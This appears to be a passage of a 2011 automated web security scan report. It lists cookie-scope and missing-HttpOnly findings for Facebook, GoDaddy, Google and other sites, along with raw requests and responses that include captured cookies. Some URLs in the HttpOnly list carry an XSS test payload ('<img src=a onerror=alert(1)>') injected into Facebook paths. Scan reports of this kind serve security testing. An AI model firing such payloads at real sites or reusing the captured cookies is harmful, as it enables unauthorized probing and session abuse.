Path:	/h02332

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.102. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.103. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.104. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.106. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.107. https://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.108. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.109. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.110. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.112. https://www.godaddy.com/gdshop/registrar/search.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.113. https://www.godaddy.com/gdshop/website.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/website.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.114. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1303613395.1.1.utmcsr=xss.cx|utmccn=(referral)|utmcmd=referral|utmcct=/apptesting.aspx; __utma=173272373.620417115.1303613395.1303613395.1303613395.1; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 05 May 2011 10:57:55 GMT
Expires: Thu, 05 May 2011 10:57:55 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

10.115. http://www.huffingtonpost.com/users/logout/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/users/logout/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/logout/ HTTP/1.1
Host: www.huffingtonpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; geocity=Dallas; huffpo_type_views=%7B%2215%22%3A1%7D; is_aol_user=1; s_pers=%20s_getnr%3D1304578722710-Repeat%7C1367650722710%3B%20s_nrgvo%3DRepeat%7C1367650722712%3B; huffpost_adssale=n; __utma=265287574.457433518.1304575105.1304575105.1304578723.2; geostate=Texas; __utmc=265287574; __utmb=265287574.3.10.1304578723; __qca=P0-822287727-1304575116403; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Length: 82719
Content-Type: text/html; charset=utf-8
Set-Cookie: huffpost_user_guid=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_prefs=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_smallphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_bigphoto=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_pass=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Set-Cookie: huffpost_user_id=deleted; expires=Wed, 05-May-2010 10:58:36 GMT; path=/; domain=.huffingtonpost.com
Expires: Thu, 05 May 2011 10:58:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 05 May 2011 10:58:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns
...[SNIP]...

10.116. http://www.marketwatch.com/News/Story/Story.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.117. http://www.moviefone.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...

10.118. http://www.truveo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=univ_ent; showAdult=0; unique=c2463cfb4c02503-f77cacedeed180d; PHPSESSID=l7a2hsj410v4vqu1e6743unjl4

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:58:21 GMT; path=/; domain=.truveo.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l7a2hsj410v4vqu1e6743unjl4; path=/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 83513

<!DOCTYPE HTML>
<html class="no-js">
<head>
<title>Truveo Video Search</title>
<script type="text/javascript">
<!--
SpriteImg = new Image();
SpriteImg.src = "http://www.truveo.com/client/versions/uni
...[SNIP]...

10.119. http://www.truveo.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/search

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.truveo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 00:57:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.3
Set-Cookie: unique=770f667cc0f81d1-7132dc48a8cf32a; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: ab=univ_ent; expires=Thu, 31-Dec-2015 05:00:00 GMT; path=/; domain=.truveo.com
Set-Cookie: showAdult=0; expires=Sat, 04-Jun-2011 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: unique=9859c0e0799d06e-bf4dcf15a92aa35; expires=Sun, 02-May-2021 00:57:00 GMT; path=/; domain=.truveo.com
Set-Cookie: queryhistory=deleted; expires=Wed, 05-May-2010 00:56:59 GMT; path=/; domain=.truveo.com
Set-Cookie: PHPSESSID=q63egmjqep6m7rjtv5e7epons1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.truveo.com/
Access-Control-Allow-Oritin: *
Content-Type: text/html; charset=utf-8
Content-Length: 105095

<!DOCTYPE HTML>
<html class="no-js">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link title="Truveo Video Search" type="application/opensearchdescription+xml" rel
...[SNIP]...

11. Cookie without HttpOnly flag set previous next
There are 98 instances of this issue:

http://www.aol.com/
http://www.aol.com/ajax.jsp
http://www.crunchboard.com/opening/detailjob.php
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
https://www.fightmagazine.com/mma-magazine/subscribe.asp
https://www.godaddy.com/gdshop/catalog.asp
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp
http://www.mapquest.com/
http://www.mapquest.com/_svc/ad/getads
http://www.mapquest.com/_svc/apixel
http://www.mapquest.com/_svc/publishing/promo
http://www.mapquest.com/_svc/searchio
http://www.mapquest.com/cdn/_uac/adpage.htm
http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg
http://www.mapquest.com/icons/stop.png
http://www.mmawarehouse.com/
http://www.mmawarehouse.com/Affliction-Georges-St-Pierre-GSP-Icon-UFC-129-Reve-p/aff-1404.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-Limited-E-p/det-1110.htm
http://www.mmawarehouse.com/Dethrone-Jose-Aldo-Signature-Series-Tee-p/det-1039.htm
http://www.mmawarehouse.com/FDM-Jake-Shields-T-Shirt-p/fdm-1009.htm
http://www.mmawarehouse.com/FORM-Athletics-Jon-Bones-Jones-UFC-128-Walkout-T-S-p/frm-1070.htm
http://www.mmawarehouse.com/Under-Armour-Georges-St-Pierre-GSP-Explosive-Bi-p/uax-1052.htm
http://www.mmawarehouse.com/Xtreme-Couture-Randy-Couture-UFC-129-Walkout-Tee-p/xtc-1020.htm
http://www.truveo.com/
http://www.truveo.com/search
http://yellowpages.aol.com/
http://www.citysbest.com/
http://www.dailyfinance.com/
http://www.dailyfinance.com/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx
http://www.facebook.com/
http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1
http://www.facebook.com/10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd
http://www.facebook.com/1242845259
http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b
http://www.facebook.com/2008/fbml
http://www.facebook.com/HockeyKen
http://www.facebook.com/KickIceForever
http://www.facebook.com/Loizza
http://www.facebook.com/burkerkink
http://www.facebook.com/careers/
http://www.facebook.com/deedee.perez1
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/fayse
http://www.facebook.com/find-friends
http://www.facebook.com/gale.l.schenk
http://www.facebook.com/help/
http://www.facebook.com/izaOllie
http://www.facebook.com/jezzas
http://www.facebook.com/kimberly.christ
http://www.facebook.com/ladonna.lokey
http://www.facebook.com/lakendra.roberts
http://www.facebook.com/login.php
http://www.facebook.com/matthew.oliveira2
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/patroyo
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/robynalys
http://www.facebook.com/share.php
http://www.facebook.com/sharer.php
http://www.facebook.com/skdarealist
http://www.facebook.com/stefanoboscolomarchi
http://www.facebook.com/theteebers
http://www.facebook.com/wmoppert
https://www.facebook.com/
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/recover.php
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
http://www.google.com/finance
http://www.huffingtonpost.com/include/geopromo.php
http://www.huffingtonpost.com/users/logout/
http://www.mapquest.com/directions
http://www.mapquest.com/maps
http://www.mapquest.com/routeplanner
http://www.marketwatch.com/News/Story/Story.aspx
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/
http://www.moviefone.com/
http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/
http://www.pageflakes.com/subscribe.aspx
http://www.popeater.com/
http://www.tuaw.com/hub/app-reviews

